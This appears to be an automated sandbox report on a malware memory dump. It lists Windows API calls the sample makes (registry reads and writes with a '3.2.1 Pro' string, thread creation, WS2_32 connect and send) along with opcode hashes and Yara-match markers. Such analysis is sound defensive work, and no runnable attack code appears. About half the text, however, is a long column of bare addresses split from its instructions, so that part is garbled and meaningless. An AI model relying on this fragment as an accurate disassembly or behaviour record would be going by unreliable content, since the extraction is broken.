                    [Instruction-address column of this function's listing (addresses from 0x004123b9 to 0x004133ed, interleaved with 0x00000000 entries) was detached from its instruction rows during extraction; the per-instruction pairing is not recoverable here.]
                    0x0041259c
                    0x004125ac
                    0x0041259e
                    0x0041259f
                    0x0041259f
                    0x0041259c
                    0x00000000
                    0x00000000
                    0x004125e1
                    0x004125e3
                    0x004125d7
                    0x004125d7
                    0x00000000
                    0x00000000
                    0x00412f50
                    0x00412f54
                    0x00412f59
                    0x00412f5c
                    0x00412f5e
                    0x00412f60
                    0x00412f65
                    0x00412f67
                    0x00412f6c
                    0x00412f71
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004125f1
                    0x004125f8
                    0x004125fd
                    0x00412600
                    0x00412604
                    0x00412606
                    0x00412611
                    0x00412613
                    0x0041261d
                    0x0041261f
                    0x00412621
                    0x00412627
                    0x004133a8
                    0x004133a8
                    0x004133ad
                    0x004133b2
                    0x004133b6
                    0x004133bb
                    0x004133bf
                    0x00000000
                    0x00000000
                    0x00412630
                    0x00412639
                    0x0041263b
                    0x00412647
                    0x00412649
                    0x00000000
                    0x00000000
                    0x004126d1
                    0x004126d1
                    0x00000000
                    0x00000000
                    0x00412655
                    0x0041265e
                    0x00412660
                    0x0041266d
                    0x00000000
                    0x00000000
                    0x00412678
                    0x00000000
                    0x00000000
                    0x0041269f
                    0x0041267a
                    0x0041267a
                    0x0041267c
                    0x0041267c
                    0x00412685
                    0x00412687
                    0x00412694
                    0x00000000
                    0x00000000
                    0x004126a3
                    0x004126aa
                    0x004126b3
                    0x004126b5
                    0x004126c2
                    0x004126c8
                    0x004126cc
                    0x00000000
                    0x00000000
                    0x004126db
                    0x004126dd
                    0x004126e9
                    0x004126eb
                    0x004126f1
                    0x004126f5
                    0x004126fb
                    0x00412700
                    0x0041270a
                    0x0041271d
                    0x00412723
                    0x00412727
                    0x0041272c
                    0x00000000
                    0x00000000
                    0x00412737
                    0x0041273b
                    0x00412741
                    0x00412746
                    0x0041274b
                    0x00412751
                    0x00412759
                    0x0041275d
                    0x00412762
                    0x00412765
                    0x0041276d
                    0x00000000
                    0x0041276d
                    0x00000000
                    0x00000000
                    0x00412779
                    0x0041277b
                    0x00412787
                    0x00412795
                    0x00000000
                    0x00000000
                    0x004127a2
                    0x004127a6
                    0x004127ac
                    0x004127b1
                    0x004127b8
                    0x004127c1
                    0x004127c3
                    0x004127cf
                    0x004127d1
                    0x004127d9
                    0x004127e2
                    0x004127e4
                    0x004127ea
                    0x004127f0
                    0x004127f2
                    0x004127f8
                    0x004127f8
                    0x004127f8
                    0x00412800
                    0x00412808
                    0x0041280e
                    0x00412810
                    0x00412812
                    0x00000000
                    0x00000000
                    0x0041281d
                    0x0041281e
                    0x00412823
                    0x00412825
                    0x00412826
                    0x00412828
                    0x00412828
                    0x00000000
                    0x00000000
                    0x0041282b
                    0x0041282f
                    0x00412834
                    0x00412837
                    0x0041283a
                    0x0041283f
                    0x00412844
                    0x00000000
                    0x00000000
                    0x0041284e
                    0x00412853
                    0x00000000
                    0x00000000
                    0x0041285d
                    0x00412862
                    0x00000000
                    0x00000000
                    0x0041286e
                    0x00412872
                    0x00412878
                    0x0041287d
                    0x00412882
                    0x00000000
                    0x00000000
                    0x00412891
                    0x00412891
                    0x00412892
                    0x00412897
                    0x0041289d
                    0x004128a2
                    0x004128a5
                    0x004128a8
                    0x004128ad
                    0x004128b2
                    0x00000000
                    0x00000000
                    0x004128c2
                    0x004128c7
                    0x004128c9
                    0x004128ce
                    0x00412887
                    0x00412887
                    0x00000000
                    0x00000000
                    0x00412f9a
                    0x00412f9b
                    0x00412fa0
                    0x00412fa6
                    0x00412fa8
                    0x00412faa
                    0x00412faa
                    0x00000000
                    0x00000000
                    0x004128d2
                    0x004128d4
                    0x004128d9
                    0x004128df
                    0x004128e4
                    0x004128e9
                    0x004128ee
                    0x004128f3
                    0x004128f6
                    0x004128fb
                    0x004128fd
                    0x004128fe
                    0x004128ff
                    0x00412900
                    0x00412901
                    0x00412906
                    0x00412908
                    0x0041290d
                    0x00412910
                    0x00412912
                    0x00412917
                    0x0041291d
                    0x00412928
                    0x0041291f
                    0x0041291f
                    0x00412924
                    0x0041292f
                    0x00412931
                    0x0041293c
                    0x0041293e
                    0x00000000
                    0x00000000
                    0x00412948
                    0x0041294e
                    0x00412953
                    0x00000000
                    0x00000000
                    0x0041295d
                    0x0041295f
                    0x00412965
                    0x0041296b
                    0x00412970
                    0x00412973
                    0x00412976
                    0x0041297d
                    0x00412986
                    0x00412988
                    0x00412994
                    0x00412997
                    0x004129a0
                    0x004129a2
                    0x004129a8
                    0x004129af
                    0x004129b3
                    0x004129ba
                    0x004129bc
                    0x004129c2
                    0x004129c8
                    0x004129ca
                    0x004129cc
                    0x00000000
                    0x00000000
                    0x004129d9
                    0x004129da
                    0x004129df
                    0x004129f2
                    0x00000000
                    0x00000000
                    0x004129fd
                    0x004129fd
                    0x004129fe
                    0x00412a03
                    0x00412a09
                    0x00412a0e
                    0x00412a11
                    0x00412a14
                    0x00412a1b
                    0x00412a1f
                    0x00412a24
                    0x00412a27
                    0x00412a2f
                    0x00412a34
                    0x004128b7
                    0x004128b7
                    0x00000000
                    0x00000000
                    0x00412a3e
                    0x00412a47
                    0x00412a4f
                    0x00000000
                    0x00000000
                    0x00412a5a
                    0x00412a61
                    0x00000000
                    0x00412a6f
                    0x00412a6f
                    0x00412a75
                    0x00000000
                    0x00000000
                    0x00412a69
                    0x00412a69
                    0x00412a7b
                    0x00412a7b
                    0x004133f0
                    0x004133f5
                    0x004133f6
                    0x004133f8
                    0x004133fa
                    0x004133ff
                    0x00413400
                    0x00413402
                    0x00413405
                    0x00413407
                    0x00413408
                    0x0041340a
                    0x0041340f
                    0x00413410
                    0x00413412
                    0x00413414
                    0x00413417
                    0x00413418
                    0x0041341b
                    0x0041341c
                    0x00413422
                    0x00413424
                    0x00413426
                    0x00413428
                    0x0041342e
                    0x0041342f
                    0x00413430
                    0x00413436
                    0x00413439
                    0x0041343b
                    0x0041343c
                    0x0041343f
                    0x00413440
                    0x00413443
                    0x00413444
                    0x00413448
                    0x0041344e
                    0x00413451
                    0x00413458
                    0x0041345a
                    0x0041345d
                    0x0041345f
                    0x00413460
                    0x00413463
                    0x00413464
                    0x00413467
                    0x00413468
                    0x0041346a
                    0x0041346d
                    0x0041346e
                    0x00413471
                    0x00413473
                    0x00413474
                    0x00413477
                    0x00413478
                    0x0041347b
                    0x0041347c
                    0x00413480
                    0x00413486
                    0x00413489
                    0x0041348b
                    0x0041348c
                    0x0041348e
                    0x00413491
                    0x00413497
                    0x00413498
                    0x0041349b
                    0x0041349c
                    0x0041349e
                    0x004134a3
                    0x004134a4
                    0x004134a7
                    0x004134a8
                    0x004134ab
                    0x004134ac
                    0x004134b2
                    0x004134b4
                    0x004134b6
                    0x004134b8
                    0x004134ba
                    0x004134bb
                    0x004134bc
                    0x004134be
                    0x004134be
                    0x004134c1
                    0x004134c3
                    0x004134c4
                    0x004134c6
                    0x004134c9
                    0x004134cb
                    0x004134cc
                    0x004134ce
                    0x004134d1
                    0x004134d3
                    0x004134d4
                    0x004134da
                    0x004134dd
                    0x004134de
                    0x004134e1
                    0x004134e3
                    0x004134e4
                    0x004134e7
                    0x004134e8
                    0x004134eb
                    0x004134ec
                    0x004134ef
                    0x004134f0
                    0x004134f0
                    0x004134f0
                    0x004134f2
                    0x004134f5
                    0x004134f8
                    0x004134fb
                    0x004134fc
                    0x004134fe
                    0x00413501
                    0x00413503
                    0x00413504
                    0x00413506
                    0x00413509
                    0x00413509
                    0x00413509
                    0x0041350a
                    0x0041350d
                    0x0041350f
                    0x00413510
                    0x00413510
                    0x00413512
                    0x00413514
                    0x00413516
                    0x00413518
                    0x0041351a
                    0x0041351b
                    0x0041351c
                    0x0041351e
                    0x00413520
                    0x00413522
                    0x00413524
                    0x00413526
                    0x00413528
                    0x0041352a
                    0x0041352c
                    0x00413531
                    0x00413533
                    0x00413534
                    0x00413535
                    0x00413539
                    0x00413541
                    0x00413543
                    0x00413544
                    0x00000000
                    0x00000000
                    0x00412a7c
                    0x00000000
                    0x00000000
                    0x00412a8e
                    0x00412a8e
                    0x00412a94
                    0x00000000
                    0x00000000
                    0x00412a88
                    0x00412a88
                    0x00412a96
                    0x00412a98
                    0x00412aa2
                    0x00412aa4
                    0x00412aab
                    0x00412aaf
                    0x00412ab6
                    0x00412ab8
                    0x00412abd
                    0x00412abf
                    0x00412ac4
                    0x00412aca
                    0x00412acb
                    0x00412acc
                    0x00412ad5
                    0x00412ad8
                    0x00412ae1
                    0x00412ae3
                    0x00412ae8
                    0x00412ae9
                    0x00412aea
                    0x00412af0
                    0x00412af2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412b1c
                    0x00412b1c
                    0x00412b22
                    0x00000000
                    0x00000000
                    0x00412b16
                    0x00412b16
                    0x00412b26
                    0x00412b2f
                    0x00412b31
                    0x00412b38
                    0x00412b3c
                    0x00412b43
                    0x00412b45
                    0x00412b4a
                    0x00412b4c
                    0x00412b51
                    0x00412b57
                    0x00412b5b
                    0x00412b62
                    0x00412b66
                    0x00412b68
                    0x00412b6d
                    0x00412b70
                    0x00412b73
                    0x00412b78
                    0x00412b7a
                    0x00412b7f
                    0x00412b82
                    0x00412b84
                    0x00412af8
                    0x00412af8
                    0x00412afb
                    0x00412aff
                    0x00412b07
                    0x00412b0c
                    0x00412b0c
                    0x00000000
                    0x00000000
                    0x00412b91
                    0x00412b9a
                    0x00412b9c
                    0x00412ba8
                    0x00412bad
                    0x00412bb9
                    0x00412bbb
                    0x00412bc1
                    0x00412bc3
                    0x00412bcd
                    0x00412bd6
                    0x00000000
                    0x00000000
                    0x00412be1
                    0x00412be6
                    0x00412be8
                    0x00412bed
                    0x00412bf2
                    0x00412bf7
                    0x00412bf9
                    0x00412bfe
                    0x00412c02
                    0x00412c03
                    0x00412c05
                    0x00412c1d
                    0x00412c22
                    0x00412c27
                    0x00412c29
                    0x00412c2e
                    0x00412c32
                    0x00412c33
                    0x00412c35
                    0x00412c50
                    0x00412c55
                    0x00412c5a
                    0x00412c5c
                    0x00412c61
                    0x00412c63
                    0x00412c98
                    0x00412c9f
                    0x00412ca6
                    0x00412caa
                    0x00412cac
                    0x00412cb1
                    0x00412cb6
                    0x00412cb8
                    0x00412cbd
                    0x00412cbe
                    0x00412cc0
                    0x00412cc6
                    0x00412cca
                    0x00412ccf
                    0x00412cd4
                    0x00412cd6
                    0x00412cdb
                    0x00412cdd
                    0x00412ce3
                    0x00412ce4
                    0x00412ce5
                    0x00000000
                    0x00412ce5
                    0x00412cc2
                    0x00412cc2
                    0x00412cc3
                    0x00412ce7
                    0x00412ce7
                    0x00412ce7
                    0x00412c65
                    0x00412c65
                    0x00412c68
                    0x00412c71
                    0x00412c73
                    0x00412c79
                    0x00412c7e
                    0x00412c7e
                    0x00000000
                    0x00412c7e
                    0x00412c37
                    0x00412c3e
                    0x00412c40
                    0x00412c46
                    0x00412c4b
                    0x00000000
                    0x00412c4b
                    0x00412c07
                    0x00412c0e
                    0x00412c10
                    0x00412c16
                    0x00412c81
                    0x00412c81
                    0x00412c83
                    0x00412c83
                    0x00000000
                    0x00000000
                    0x00412d88
                    0x00412d89
                    0x00412d8f
                    0x00412d91
                    0x00412d9f
                    0x00412da9
                    0x00412db1
                    0x00412db7
                    0x00412dbe
                    0x00412dc2
                    0x00412dc6
                    0x00412dcb
                    0x00412dce
                    0x00412dd2
                    0x00412dd4
                    0x00412dd9
                    0x00412ddb
                    0x00412de0
                    0x00413189
                    0x00413189
                    0x0041318d
                    0x0041318d
                    0x0041318d
                    0x00000000
                    0x00000000
                    0x00412cf5
                    0x00412cf7
                    0x00412cfd
                    0x00412d04
                    0x00412d0d
                    0x00412d0f
                    0x00412d14
                    0x00412d23
                    0x00412d26
                    0x00412d2d
                    0x00412d31
                    0x00412d38
                    0x00412d3a
                    0x00412d41
                    0x00412d4a
                    0x00412d65
                    0x00000000
                    0x00412d65
                    0x00000000
                    0x00000000
                    0x00412d6e
                    0x00412d74
                    0x00412d76
                    0x00412d7c
                    0x00412d82
                    0x00412d82
                    0x00000000
                    0x00412d82
                    0x00000000
                    0x00000000
                    0x00412dea
                    0x00412dec
                    0x00412df6
                    0x00412df8
                    0x00412dfe
                    0x00412e02
                    0x00412e09
                    0x00412e0b
                    0x00412e10
                    0x00412e12
                    0x00412e14
                    0x00000000
                    0x00000000
                    0x00412e1e
                    0x00412e22
                    0x00412e26
                    0x00412e2a
                    0x00412e2e
                    0x00412e37
                    0x00412e39
                    0x00412e3e
                    0x00412e42
                    0x00412e44
                    0x00412e4a
                    0x00412e4d
                    0x00412e53
                    0x00412e57
                    0x00412e64
                    0x00412817
                    0x00412817
                    0x00412817
                    0x00000000
                    0x00000000
                    0x00412e6e
                    0x00000000
                    0x00000000
                    0x00412e7a
                    0x00412e7e
                    0x00412e83
                    0x00412e86
                    0x00412e8e
                    0x00000000
                    0x00000000
                    0x00412e9a
                    0x00412e9e
                    0x00412ea3
                    0x00412ea6
                    0x00412eae
                    0x00000000
                    0x00000000
                    0x00412eba
                    0x00412ebe
                    0x00412ec3
                    0x00412ec6
                    0x00412ece
                    0x00000000
                    0x00000000
                    0x00412ed8
                    0x00412ed9
                    0x00412ede
                    0x00412ee0
                    0x00412ee6
                    0x00412ee8
                    0x00412eee
                    0x00412ef0
                    0x00412efa
                    0x00412f01
                    0x00412f02
                    0x00412f0d
                    0x00412f0f
                    0x00412f1a
                    0x00412f24
                    0x00412f26
                    0x00000000
                    0x00000000
                    0x00412f32
                    0x00412f36
                    0x00412f3b
                    0x00412f3e
                    0x00412f46
                    0x00000000
                    0x00000000
                    0x00412f7c
                    0x00412f80
                    0x00412f85
                    0x00412f88
                    0x00412f90
                    0x004130e5
                    0x00000000
                    0x00000000
                    0x00412454
                    0x0041244c
                    0x00412442
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: CountEventTick
                    • String ID: 8E@
                    • API String ID: 180926312-787191786
                    • Opcode ID: 8516ac5fc6a3a2d74ffd2756932dd14e2d251496c26aaab0610de99dc60ab54a
                    • Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
                    • Opcode Fuzzy Hash: 8516ac5fc6a3a2d74ffd2756932dd14e2d251496c26aaab0610de99dc60ab54a
                    • Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C334), ref: 00404D98
                    • CreateThread.KERNELBASE(00000000,00000000,?,0046C2E8,00000000,00000000), ref: 00404DAB
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DB6
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DBF
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                    • String ID:
                    • API String ID: 2579639479-0
                    • Opcode ID: 02c52cb5bce6d97099f4824c0942453cfcfa184bbfd0e7552393798b6c3b6f1e
                    • Instruction ID: 953b0e9f26d888488a0b13dcb1c7857754b01e04207d428095d89ba0379a6afb
                    • Opcode Fuzzy Hash: 02c52cb5bce6d97099f4824c0942453cfcfa184bbfd0e7552393798b6c3b6f1e
                    • Instruction Fuzzy Hash: 034171B1900219AFCB10EBA5CC559FEBBBDAF44314F04016EF952B32D1DB38A9458B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • connect.WS2_32(?,?,00000010), ref: 00404A23
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: connect
                    • String ID: TLS Authentication failed$[ERROR]
                    • API String ID: 1959786783-1964023390
                    • Opcode ID: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
                    • Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
                    • Opcode Fuzzy Hash: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
                    • Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
                    • Instruction ID: f0011bd8ba433ad85047860dc40924a10541953e35d1305fdf776f14d2f3b5fd
                    • Opcode Fuzzy Hash: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
                    • Instruction Fuzzy Hash: AF315F36D00210A7CF25AF69E841ABF77B4EF4C764F25409FFD0597240EA399D428798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                    • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                    • RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
                    • Instruction ID: 441e9820231bba63bf934a94159cc2a1568a4eaa66ed414e7fe82764e71c2100
                    • Opcode Fuzzy Hash: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
                    • Instruction Fuzzy Hash: E5014B3180022DFBCF219FA1DC49DEB7F38EF157A1F004165BA08621A1D6759AA5DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                    • RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                    • RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID:
                    • API String ID: 1818849710-0
                    • Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                    • Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
                    • Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                    • Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 00447661
                    • _free.LIBCMT ref: 0044769A
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free_free
                    • String ID:
                    • API String ID: 2716640707-0
                    • Opcode ID: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                    • Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
                    • Opcode Fuzzy Hash: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                    • Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
                    • RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
                    • RegCloseKey.ADVAPI32(00000000), ref: 0041092C
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                    • Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
                    • Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                    • Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                    • RegCloseKey.KERNELBASE(?), ref: 004108CE
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                    • Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
                    • Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                    • Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?,00000001), ref: 00416EE4
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID: @
                    • API String ID: 1890195054-2766056989
                    • Opcode ID: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
                    • Instruction ID: 6e419d6119f7d5a92ba7ea5aa2db3d9dcc0ca085608ff36f3d6b7b397ab9513c
                    • Opcode Fuzzy Hash: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
                    • Instruction Fuzzy Hash: 3ED017B580231C9FC720EFA8E804A8DBBFCFB08210F00056AEC49E3300E770A8108B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                    • Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
                    • Opcode Fuzzy Hash: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                    • Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                    • Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
                    • Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                    • Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
                    • Instruction ID: 74d36269402cbfa58112ba2610b1878482336c4429228e10655473553982713d
                    • Opcode Fuzzy Hash: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
                    • Instruction Fuzzy Hash: 89E0ED22A0941061E629323E7C4176B02668BC677DF21132BF528C62C2EFBC488381AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Window$ForegroundText
                    • String ID:
                    • API String ID: 29597999-0
                    • Opcode ID: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
                    • Instruction ID: aaff8fddf6ef76f16923c3f9de4e1078fffc563957b707b355cfa3dba45694d1
                    • Opcode Fuzzy Hash: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
                    • Instruction Fuzzy Hash: 2ED0C231A0032867EA206BE49C4DFA5772C9704B42F0001AABD14D3182DD74990487D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                    • Instruction ID: e6e99268b29485b263ac33084d07fd67f49e3475c5b5c63b65d8ccfcab0936ee
                    • Opcode Fuzzy Hash: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                    • Instruction Fuzzy Hash: 1B218571B001055BCB14EFB6858A6BE77AAAF84314F10403FE415BB2C2DBBC5E019799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: 25d7fed7c81a192a25496bf869757bfb83f96b60a3083e9c2314e92a879b28c7
                    • Instruction ID: b7cc105376a0c6c17fc0074abac2d673c8eb48d7e6be34cea40eb70dca5961eb
                    • Opcode Fuzzy Hash: 25d7fed7c81a192a25496bf869757bfb83f96b60a3083e9c2314e92a879b28c7
                    • Instruction Fuzzy Hash: 7E214F7190020AABC705FB51E856FEEB778AF10304F10817FA5127B1E1DF78A905CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0043F348: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389
